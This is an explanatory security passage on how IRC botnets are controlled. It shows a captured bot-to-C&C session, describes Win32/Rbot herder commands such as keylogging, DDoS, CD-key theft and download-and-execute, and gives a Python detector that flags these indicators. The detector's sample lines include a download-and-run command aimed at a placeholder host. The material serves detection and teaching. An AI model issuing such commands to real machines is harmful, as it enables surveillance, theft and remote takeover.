Controlling the Botnet
After a bot infects a computer, it attempts to contact its C&C server for instructions. A typical communication that can be observed after a successful infection might look like the following excerpt:
<- :irc.XXX.XXX NOTICE AUTH :*** Looking up your hostname...
<- :irc.XXX.XXX NOTICE AUTH :*** Found your hostname
-> PASS s3rv3rp455
-> NICK [d1f]-511202
-> USER hlxahl 0 0 :hlxahl
<- :irc.XXX.XXX NOTICE [d1f]-511202 :*** If you are having problems connecting due to ping timeouts, please type /quote pong SF125722 or /raw pong SF125722 now.
<- PING :SF125722
-> PONG :SF125722
<- :irc.XXX.XXX 001 [d1f]-511202 :Welcome to the irc.XXX.XXX IRC Network [d1f]-511202!hlxahl@heh
<- :irc.XXX.XXX 002 [d1f]-511202 :Your host is irc.XXX.XXX, running version Unreal3.2.7
<- :irc.XXX.XXX 003 [d1f]-511202 :This server was created Mon Sep 10 2007 at 20:30:33 PDT
<- :irc.XXX.XXX 004 [d1f]-511202 irc.XXX.XXX Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
After connecting, the bot tries to join the operator's channel as configured:
-> JOIN #[d1f] channelpassword
-> MODE [d1f]-511202 +iwx
If the channel topic does not contain any instructions for the bot, it remains idle in the channel, awaiting commands.
To control the bots, bot-herders enter the channel like ordinary IRC users and issue specially formatted commands. With some commands, such as those that collect and report information about the victim's computer, the bots report their results as chat messages within the IRC channel, or save them locally as files that the herder can retrieve later. Depending on the capabilities of the bot malware, bot-herders can execute a wide range of actions, as described in "How Botnets Are Used." A brief selection of typical botnet commands, in this case from the Win32/Rbot family, provides an idea of the kinds of operations a herder can execute:
- .capture. Generates and saves an image or video file. Depending on the parameters used, this file could be a screenshot of the victim's desktop or a still image or video from the victim's webcam. The operator can recover the saved picture using the .get command.
- .ddos.syn, .ddos.ack, .ddos.random. Launches a DDoS attack on a specified IP address for a specified length of time.
- .download. Downloads a file from a specified URL to the victim's computer and optionally executes it.
- .findfile. Searches for files on the victim's computer by name and returns the paths of any files found.
- .getcdkeys. Returns product keys for software installed on the victim's computer.
- .keylog. Logs the victim's keystrokes and saves them to a file.
- .login, .logout. Authenticates the bot-herder with the bots. Before issuing commands to any bots in the channel, the bot-herder must use the .login command with a password that is specified in the bots' configuration data so the bots will recognize the bot-herder as an authorized controller.
- .open. Opens a program, an image, or a URL in a web browser.
- .procs. Lists the processes running on the victim's computer. Other commands can then be used to kill processes by name or ID.
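As an added detection example (not code from the original report), the following Python scanner reads captured IRC lines in the arrow format used above and flags three indicators of Rbot-style C&C traffic: the `[tag]-digits` nick pattern, a JOIN that carries a channel key, and in-channel messages beginning with one of the command names listed. The sample lines, the herder's hostmask and the passwords are constructed placeholders.

```python
import re

# Command names taken from the Win32/Rbot list in the text; a real deployment
# would extend this with the families seen in its own environment.
RBOT_COMMANDS = {".capture", ".ddos.syn", ".ddos.ack", ".ddos.random", ".download",
                 ".findfile", ".getcdkeys", ".keylog", ".login", ".logout",
                 ".open", ".procs"}

NICK_RE = re.compile(r"^\[[a-z0-9]{2,5}\]-\d{4,}$", re.I)          # e.g. [d1f]-511202
PRIVMSG_RE = re.compile(r"^:(?P<src>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$")


def parse(line):
    """Split a captured line into direction ('->' bot to server, '<-' server to bot)
    and the raw IRC message that follows it."""
    direction, _, msg = line.partition(" ")
    return direction, msg.strip()


def analyze(lines):
    """Return a list of (indicator, detail) tuples for suspicious lines."""
    findings = []
    for line in lines:
        direction, msg = parse(line)
        if direction == "->" and msg.startswith("NICK "):
            nick = msg.split(None, 1)[1]
            if NICK_RE.match(nick):
                findings.append(("rbot_style_nick", nick))
        elif direction == "->" and msg.startswith("JOIN "):
            parts = msg.split()
            if len(parts) >= 3:                     # JOIN <channel> <key>
                findings.append(("keyed_channel_join", parts[1]))
        elif direction == "<-":
            m = PRIVMSG_RE.match(msg)
            if m:
                words = m.group("text").split()
                if words and words[0].lower() in RBOT_COMMANDS:
                    findings.append(("herder_command", words[0].lower()))
    return findings


# Constructed sample capture, modelled on the exchange shown in the text.
SAMPLE = [
    "-> PASS s3rv3rp455",
    "-> NICK [d1f]-511202",
    "-> USER hlxahl 0 0 :hlxahl",
    "-> JOIN #[d1f] channelpassword",
    "<- :herder!op@example.invalid PRIVMSG #[d1f] :.login botpassword",
    "<- :herder!op@example.invalid PRIVMSG #[d1f] :.procs",
    "<- :herder!op@example.invalid PRIVMSG #[d1f] :.download http://example.invalid/update.exe 1",
]

if __name__ == "__main__":
    for indicator, detail in analyze(SAMPLE):
        print(f"{indicator}: {detail}")
```

Any one indicator alone can be benign (keyed channels are common on legitimate IRC networks), so the useful alert is the combination of the nick pattern, a keyed join and a herder command on the same connection.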